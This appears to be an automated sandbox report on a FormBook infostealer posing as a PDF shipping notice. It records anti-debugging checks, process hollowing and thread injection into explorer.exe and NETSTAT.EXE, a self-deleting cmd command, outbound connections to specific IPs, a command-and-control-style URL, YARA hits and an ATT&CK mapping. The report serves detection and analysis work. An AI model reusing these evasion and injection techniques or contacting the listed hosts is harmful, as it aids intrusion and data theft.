Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1DAC0 mov eax, dword ptr fs:[00000030h]	6_2_1EA1DAC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1DAC0 mov eax, dword ptr fs:[00000030h]	6_2_1EA1DAC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1DAC0 mov eax, dword ptr fs:[00000030h]	6_2_1EA1DAC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1DAC0 mov eax, dword ptr fs:[00000030h]	6_2_1EA1DAC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1DAC0 mov eax, dword ptr fs:[00000030h]	6_2_1EA1DAC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA00ACE mov eax, dword ptr fs:[00000030h]	6_2_1EA00ACE
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA00ACE mov eax, dword ptr fs:[00000030h]	6_2_1EA00ACE
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9EFAEC mov edi, dword ptr fs:[00000030h]	6_2_1E9EFAEC
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F0AED mov eax, dword ptr fs:[00000030h]	6_2_1E9F0AED
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F0AED mov eax, dword ptr fs:[00000030h]	6_2_1E9F0AED
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F0AED mov eax, dword ptr fs:[00000030h]	6_2_1E9F0AED
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F9AE4 mov eax, dword ptr fs:[00000030h]	6_2_1E9F9AE4
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1DA20 mov eax, dword ptr fs:[00000030h]	6_2_1EA1DA20
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1DA20 mov eax, dword ptr fs:[00000030h]	6_2_1EA1DA20
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1DA20 mov eax, dword ptr fs:[00000030h]	6_2_1EA1DA20
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1DA20 mov eax, dword ptr fs:[00000030h]	6_2_1EA1DA20
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1DA20 mov eax, dword ptr fs:[00000030h]	6_2_1EA1DA20
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1DA20 mov edx, dword ptr fs:[00000030h]	6_2_1EA1DA20
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA7DA31 mov eax, dword ptr fs:[00000030h]	6_2_1EA7DA31
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAADA30 mov eax, dword ptr fs:[00000030h]	6_2_1EAADA30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA2AA0E mov eax, dword ptr fs:[00000030h]	6_2_1EA2AA0E
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA2AA0E mov eax, dword ptr fs:[00000030h]	6_2_1EA2AA0E
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9E7A30 mov eax, dword ptr fs:[00000030h]	6_2_1E9E7A30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9E7A30 mov eax, dword ptr fs:[00000030h]	6_2_1E9E7A30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9E7A30 mov eax, dword ptr fs:[00000030h]	6_2_1E9E7A30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F1A24 mov eax, dword ptr fs:[00000030h]	6_2_1E9F1A24
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F1A24 mov eax, dword ptr fs:[00000030h]	6_2_1E9F1A24
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EABBA66 mov eax, dword ptr fs:[00000030h]	6_2_1EABBA66
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EABBA66 mov eax, dword ptr fs:[00000030h]	6_2_1EABBA66
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EABBA66 mov eax, dword ptr fs:[00000030h]	6_2_1EABBA66
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EABBA66 mov eax, dword ptr fs:[00000030h]	6_2_1EABBA66
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9EFA44 mov ecx, dword ptr fs:[00000030h]	6_2_1E9EFA44
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1EA40 mov eax, dword ptr fs:[00000030h]	6_2_1EA1EA40
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1EA40 mov eax, dword ptr fs:[00000030h]	6_2_1EA1EA40
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA7DA40 mov eax, dword ptr fs:[00000030h]	6_2_1EA7DA40
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA8AA40 mov eax, dword ptr fs:[00000030h]	6_2_1EA8AA40
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA8AA40 mov eax, dword ptr fs:[00000030h]	6_2_1EA8AA40
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA29A48 mov eax, dword ptr fs:[00000030h]	6_2_1EA29A48
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA29A48 mov eax, dword ptr fs:[00000030h]	6_2_1EA29A48
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA74A57 mov eax, dword ptr fs:[00000030h]	6_2_1EA74A57
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA74A57 mov eax, dword ptr fs:[00000030h]	6_2_1EA74A57
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAB8BBE mov eax, dword ptr fs:[00000030h]	6_2_1EAB8BBE
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAB8BBE mov eax, dword ptr fs:[00000030h]	6_2_1EAB8BBE
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAB8BBE mov eax, dword ptr fs:[00000030h]	6_2_1EAB8BBE
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAB8BBE mov eax, dword ptr fs:[00000030h]	6_2_1EAB8BBE
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA01B80 mov eax, dword ptr fs:[00000030h]	6_2_1EA01B80
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA71B93 mov eax, dword ptr fs:[00000030h]	6_2_1EA71B93
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA7DB90 mov eax, dword ptr fs:[00000030h]	6_2_1EA7DB90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F3BA4 mov eax, dword ptr fs:[00000030h]	6_2_1E9F3BA4
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F3BA4 mov eax, dword ptr fs:[00000030h]	6_2_1E9F3BA4
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F3BA4 mov eax, dword ptr fs:[00000030h]	6_2_1E9F3BA4
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F3BA4 mov eax, dword ptr fs:[00000030h]	6_2_1E9F3BA4
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA21B9C mov eax, dword ptr fs:[00000030h]	6_2_1EA21B9C
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA25BE0 mov eax, dword ptr fs:[00000030h]	6_2_1EA25BE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA25BE0 mov eax, dword ptr fs:[00000030h]	6_2_1EA25BE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA01BE7 mov eax, dword ptr fs:[00000030h]	6_2_1EA01BE7
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA01BE7 mov eax, dword ptr fs:[00000030h]	6_2_1EA01BE7
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAC4BE0 mov eax, dword ptr fs:[00000030h]	6_2_1EAC4BE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9EEBC0 mov eax, dword ptr fs:[00000030h]	6_2_1E9EEBC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1FBC0 mov ecx, dword ptr fs:[00000030h]	6_2_1EA1FBC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1FBC0 mov eax, dword ptr fs:[00000030h]	6_2_1EA1FBC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1FBC0 mov eax, dword ptr fs:[00000030h]	6_2_1EA1FBC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1FBC0 mov eax, dword ptr fs:[00000030h]	6_2_1EA1FBC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1FBC0 mov eax, dword ptr fs:[00000030h]	6_2_1EA1FBC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA2BBC0 mov eax, dword ptr fs:[00000030h]	6_2_1EA2BBC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA2BBC0 mov eax, dword ptr fs:[00000030h]	6_2_1EA2BBC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA2BBC0 mov ecx, dword ptr fs:[00000030h]	6_2_1EA2BBC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA2BBC0 mov eax, dword ptr fs:[00000030h]	6_2_1EA2BBC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA6FBC2 mov eax, dword ptr fs:[00000030h]	6_2_1EA6FBC2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA74BC0 mov eax, dword ptr fs:[00000030h]	6_2_1EA74BC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA74BC0 mov eax, dword ptr fs:[00000030h]	6_2_1EA74BC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA74BC0 mov eax, dword ptr fs:[00000030h]	6_2_1EA74BC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA74BC0 mov eax, dword ptr fs:[00000030h]	6_2_1EA74BC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9E7BF0 mov eax, dword ptr fs:[00000030h]	6_2_1E9E7BF0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9E7BF0 mov ecx, dword ptr fs:[00000030h]	6_2_1E9E7BF0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9E7BF0 mov eax, dword ptr fs:[00000030h]	6_2_1E9E7BF0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9E7BF0 mov eax, dword ptr fs:[00000030h]	6_2_1E9E7BF0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA18BD1 mov eax, dword ptr fs:[00000030h]	6_2_1EA18BD1
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA18BD1 mov eax, dword ptr fs:[00000030h]	6_2_1EA18BD1
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA96BDE mov ebx, dword ptr fs:[00000030h]	6_2_1EA96BDE
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA96BDE mov eax, dword ptr fs:[00000030h]	6_2_1EA96BDE
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9ECB1E mov eax, dword ptr fs:[00000030h]	6_2_1E9ECB1E
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA2CB20 mov eax, dword ptr fs:[00000030h]	6_2_1EA2CB20
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA7CB20 mov eax, dword ptr fs:[00000030h]	6_2_1EA7CB20
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA7CB20 mov eax, dword ptr fs:[00000030h]	6_2_1EA7CB20
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA7CB20 mov eax, dword ptr fs:[00000030h]	6_2_1EA7CB20
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA7DB2A mov eax, dword ptr fs:[00000030h]	6_2_1EA7DB2A
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F8B10 mov eax, dword ptr fs:[00000030h]	6_2_1E9F8B10
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F8B10 mov eax, dword ptr fs:[00000030h]	6_2_1E9F8B10
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F8B10 mov eax, dword ptr fs:[00000030h]	6_2_1E9F8B10
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA31B0F mov eax, dword ptr fs:[00000030h]	6_2_1EA31B0F
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA31B0F mov eax, dword ptr fs:[00000030h]	6_2_1EA31B0F
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA00B10 mov eax, dword ptr fs:[00000030h]	6_2_1EA00B10
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA00B10 mov eax, dword ptr fs:[00000030h]	6_2_1EA00B10
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA00B10 mov eax, dword ptr fs:[00000030h]	6_2_1EA00B10
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA00B10 mov eax, dword ptr fs:[00000030h]	6_2_1EA00B10
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA7DB1B mov eax, dword ptr fs:[00000030h]	6_2_1EA7DB1B
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1EB1C mov eax, dword ptr fs:[00000030h]	6_2_1EA1EB1C
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAC4B67 mov eax, dword ptr fs:[00000030h]	6_2_1EAC4B67
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA24B79 mov eax, dword ptr fs:[00000030h]	6_2_1EA24B79

Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe

Code function: 6_2_1EA32EB0 NtProtectVirtualMemory,LdrInitializeThunk,

6_2_1EA32EB0

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 154.94.229.8 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 107.178.157.225 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.64.163.50 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 35.198.112.85 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 70.40.220.123 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 183.181.99.12 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 184.168.98.97 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 64.190.62.111 80	Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe

Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 2A0000

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Thread register set: target process: 4672			Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Thread register set: target process: 4672			Jump to behavior

Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Process created: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe"			Jump to behavior

Source: explorer.exe, 00000007.00000000.22750707443.000000000D05E000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22980392582.000000000D05E000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22651288186.000000000D05E000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndKr\|
Source: explorer.exe, 00000007.00000000.22729255277.0000000001251000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22633968917.0000000001251000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22958895902.0000000001251000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22678711865.0000000001251000.00000002.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26929829622.0000000004470000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000007.00000000.22729255277.0000000001251000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22683923873.0000000004790000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22633968917.0000000001251000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22958895902.0000000001251000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22678711865.0000000001251000.00000002.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26929829622.0000000004470000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.22729255277.0000000001251000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22633968917.0000000001251000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22958895902.0000000001251000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22678711865.0000000001251000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22727056323.0000000000B94000.00000004.00000020.sdmp, explorer.exe, 00000007.00000000.22956960258.0000000000B94000.00000004.00000020.sdmp, explorer.exe, 00000007.00000000.22632233648.0000000000B94000.00000004.00000020.sdmp, NETSTAT.EXE, 00000008.00000002.26929829622.0000000004470000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000007.00000000.22729255277.0000000001251000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22633968917.0000000001251000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22958895902.0000000001251000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22678711865.0000000001251000.00000002.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26929829622.0000000004470000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Stealing of Sensitive Information:

Yara detected Generic Dropper

Show sources

Source: Yara match	File source: Process Memory Space: Arrival Notice, CIA Awb Inv Form.pdf.exe PID: 7132, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: NETSTAT.EXE PID: 5904, type: MEMORYSTR

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	DLL Side-Loading1	Process Injection512	Masquerading1	Credential API Hooking1	Security Software Discovery321	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Rootkit1	LSASS Memory	Virtualization/Sandbox Evasion22	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion22	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection512	NTDS	System Network Configuration Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol114	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	System Network Connections Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information13	Cached Domain Credentials	System Information Discovery12	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	DLL Side-Loading1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	File Deletion1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Arrival Notice, CIA Awb Inv Form.pdf.exe	37%	Virustotal		Browse
Arrival Notice, CIA Awb Inv Form.pdf.exe	31%	ReversingLabs	Win32.Trojan.Tnega

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://powerpoint.office.come	0%	Avira URL Cloud	safe
http://www.thaicharuen.com/s3f1/?0v=mH/60k+8QaINko6jE2QpZl5PE74OV+HVH/ClSiWHQSmVZS7BQfRqR+Cg+8qmWPEHLuT3&kTGXE2=5jpDxBr8jNJ0VnGP	0%	Avira URL Cloud	safe
